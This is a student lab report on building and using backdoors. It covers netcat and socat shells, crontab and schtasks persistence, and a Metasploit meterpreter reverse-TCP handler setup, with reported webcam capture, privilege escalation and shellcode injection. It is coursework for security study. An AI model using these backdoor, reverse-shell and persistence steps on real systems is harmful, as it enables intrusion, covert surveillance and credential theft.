20212314 2023-2024-2 《网络与系统攻防技术》实验二实验报告

20212314严东波 2024-04-02 22:03:33

1.实验内容

  • 1.1实践目标

img

  • 1.2实验问题

  • (1)例举你能想到的一个后门进入到你系统中的可能方式?
    恶意软件可能会伪装成合法软件的附件,比如某些免费的应用程序。

  • (2)例举你知道的后门如何启动起来(win及linux)的方式?
    Windows:在注册表中设置开机自启
    linux:通过crontab功能设置任务定时启动,对正常程序注入shellcode使其连带启动

  • (3)Meterpreter有哪些给你映像深刻的功能?
    获取目标主机摄像头、截屏等功能

  • (4)如何发现自己有系统有没有被安装后门?
    可以通过监控网络活动并查看是否有大量的数据流量发送到未知的IP地址

2.实验过程

2.1 windows下使用netcat获取kali的Shell,用cron命令启动某项任务

  • windows需要从从附件工具上下载ncat.rar后解压,kali直接执行nc命令后提示下载,windows和linux进入ncat.exe所在的目录后执行图示代码,windows成功获取linux的shell

img

img

  • 用cron命令启动某项任务,首先进入root(我是直接使用root权限连接的),接着在Windows输入命令crontab -e,可以看到一堆乱码,在kali的/var/spool/cron/crontabs/目录下可以看到文件(我将crontabs文件的权限更改了,所以可以直接进去)

img

img

  • 之后运行echo “* * * * * * echo “2314” >> /home/kali/sy2/20212314ys2.txt” >> /var/spool/cron/crontabs/root该命令,在crontabs下的用户任务文件里添加一项任务,并通过crontab -l查询任务内容,可以看到任务添加成功

img

img

2.2 kali下使用socat获取windows的Shell, 用schtasks命令创建并启动某项任务计划

  • 在实验开始前需要将防火墙和Windows安全中心关闭

img

  • 接着使用socat获取windows的Shell,如图获取成功

img

img

  • 用schtasks命令创建并启动某项任务计划,下面是我的C语言代码,向D:\20212314.txt中写入20212314ydb!

img

  • 通过输入schtasks命令创建一个名为“Test20212314”的任务,每隔一分钟就会执行上述程序,通过windows可以查看到它的任务计划
schtasks /create /sc minute /mo 1 /tn “Test20212314” /tr D:\studys\Ccode\Cstart\homework\test1.exe

img

img

2.3 使用MSF meterpreter生成后门文件,利用ncat或socat传送到主机并运行,获取主机Shell

  • 确定主机和虚拟机能相互ping通

img

img

img

  • 使用MSF meterpreter生成后门文件,并利用ncat或socat将后门文件传送到主机

img

img

img

  • 进入kali的MSF控制台,开始准备监听
msfconsole    //进入MSF控制台
use exploit/multi/handler    //使用监听模块
set payload windows/meterpreter/reverse_tcp    //使用和生成后门程序时相同的payload
set LHOST 192.168.246.130    //和之前生成后门程序时设置的kali的IP相同
set LPORT 2314    //和之前生成后门程序时设置的端口相同
show options    //显示参数配置情况,检查参数是否正确设置
exploit    //开启监听

img

img

  • kali保持监听,windows start 20212314_backdoor.exe,成功获取shell

img

img

2.4 使用MSF meterpreter生成后门文件,获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • 获取系统信息、当前屏幕,摄像头抓拍照片

img

img

img

img

  • 尝试提权并获取密码,成功

img

img

2.5 使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

  • 使用MSF生成shellcode,在Linux将获取shell的攻击代码写入pwn1,最终生成一个20212314pwn文件

img

img

  • 在kali中打开另一个终端,进行监听操作,成功获取shell,之后在开始的终端中执行20212314pwn,可以看到成功获取了shell

img

3.问题及解决方案

  • crontab -e无法编辑任务内容,使用echo代码也无法创建文件。解决方式是直接先写入代码

img

  • 关了防火墙但忘记关Windows安全中心,传输的后门文件被截杀

  • 仍旧是文件权限问题,出现的各种和文件相关的问题都可以先试试先修改文件的权限chmod +755 文件名

4.学习感悟、思考

这次实验开始接触netcat、socat和MSF这些工具的使用,实验开始得比较晚,有不少同学的实验报告去借鉴,出现的很多错误也多大能找到相应的解决方式。这次实验给我带来的收获有很多,尤其是黑客的体验,攻击的同时也让我提高了警惕心理。此外,本次实验我还了解了一些免杀技术,例如使用msfvenom生成后门代码、使用socat绕过检测等。

5.参考资料

...全文
42 回复 打赏 收藏 转发到动态 举报
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复
网络信息安全综合实验 任 务 书 一、 目的与要求 根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上, 能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各 类安全问题,维护网络及操作系统的安全。 、 主要内容 实验一加密认证通信系统实现 设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和 认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语 言不限,可以直接调用现有模块,认证和加密不限) 实验 综合扫描及安全评估 利用常见的一些扫描工具可以检测本系统及其它系统是否存在漏洞等安全隐患,给出 全面而完善的评估报告,帮助管理员发现存在的问题,进而采取有力措施予以弥补,从 而提高系统的安全性能。 实验网络攻防技术 矛与盾的关系告诉我们,在研究网络安全技术时,只着眼于安全防范技术是远远不够 的,知己知彼方能百战不殆,因此,很有必要同时研究攻击与防范技术,才能更有效地 解决各种威胁。 实验四 Windows系统安全配置方案 作为网络节点,操作系统安全成为网络信息安全首先应予考虑的事务,然而人们往往 忽视了OS的安全性。其实,OS的安全不只体现在密码口令上,这仅仅是最基本的一个方 面。除此之外,服务、端口、共享资源以及各种应用都很有可能存在着安全隐患,因此 ,应采取相应措施设置完善的本地安全策略,并使用防病毒软件、防火墙软件甚至入侵 检测软件来加强系统的安全。 其中实验一要求编程实现,可直接调用相关功能函数完成。实验实验四可在机房 的网络信息安全综合实验系统上完成。 三、 进度计划 "序号 "设计(实验)内容 "完成时间 "备注 " "1 "接受任务,查阅文献,开始实 "第一天 " " " "现密码算法和认证算法 " " " "2 "完成加密认证通信系统 "第至七天 " " "3 "上午完成综合扫描及安全评估 "第八天 " " " "实验,下午进行网络攻防实验 " " " "4 "上午完成网络攻防实验,下午 "第九天 " " " "进行系统安全配置实验 " " " "5 "撰写实验报告并验收 "第十天 " " 四、 实验成果要求 1. 要求程序能正常运行,并实现任务书要求功能。 2. 完成实验报告,要求格式规范,内容具体而翔实,应体现自身所作的工作,注重 对设计思路的归纳和对问题解决过程的总结。 五、 考核方式 平时成绩+程序验收+实验报告。 学生姓名: 指导教师: 2016 年 6 月 13 日 实验报告 题 目: 网络信息安全综合实验 院 系:计算机系 班 级: 学 号: 学生姓名: 指导教师: 成 绩: 实验日期:2021 年 6 月 一、 目的与要求 根据实验内容的要求和实验安排,要求学生在掌握网络信息安全基本知识的基础上, 能够设计出相应的软件,并且熟练地运用各种网络信息安全技术和手段,发现并解决各 类安全问题,维护网络及操作系统的安全。 实验内容 设计实现一个通信系统,双方可以通过消息和文件通信,用户可选择一种加密算法和 认证算法,对消息和文件进行加密通信和完整性验证。(要实现认证和加密,工具和语 言不限,可以直接调用现有模块,认证和加密不限) 三、实验结果 实验一:本通信系统为用C#语言编写的P2P方式通信的系统,其具体功能如下: 1、识别本机IP地址并赋值到文本框中,产生一个随机数作为端口号,端口号范围限制在 1000到65535之间。 2、通过运用网络编程的知识尝试用产生的IP与端口号进行监听。 图1 发送方界面 图2 接收方界面 3、设置刷新区域,定时刷新好友在线,可以设置刷新间隔,启动和停止刷新。这里 可以通过拖拽VS里自带的控件"timersecond",实现计时。 4、发送消息。消息的传送是具有加密与认证的。 加密:考虑到DES的安全性问题,加密消息是采用AES方式加密的,本系统采用的是 C#封装好的AES程序,调用接口,实现对明文的加密。解密同理。 认证:认证是将明文哈希散列后采用RSA算法对其进行签名,再用公钥加密进行认证 的,其中哈希散列采用的是SHA1方式。下图为加密与认证的具体流程。 图3 加密与认证流程 图4 发送方可显示明文与密文 图5接收方解密出明文 5、可以发送文件。通过获取文本框中的文件地址,建立文件流,向接收端发送文件 。 接收端进行文件监听,接收文件,与发送文件编写过程相似,只是把"写"换成了"读"文 件。VS里自带的控件"saveFileDialog"可以帮助用户提示选择保存文件的位置。 图6 输入文件位置 图7 询问是否接受文件 图8 接收与发送文件成功 实验:认识性实验实验为认识练习信息安全实验平台的部分实验。 SuperScan端口扫描实验 扫描结果如下图: 图

92

社区成员

发帖
与我相关
我的任务
社区描述
网络攻防作业
网络安全 高校
社区管理员
  • blackwall0321
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧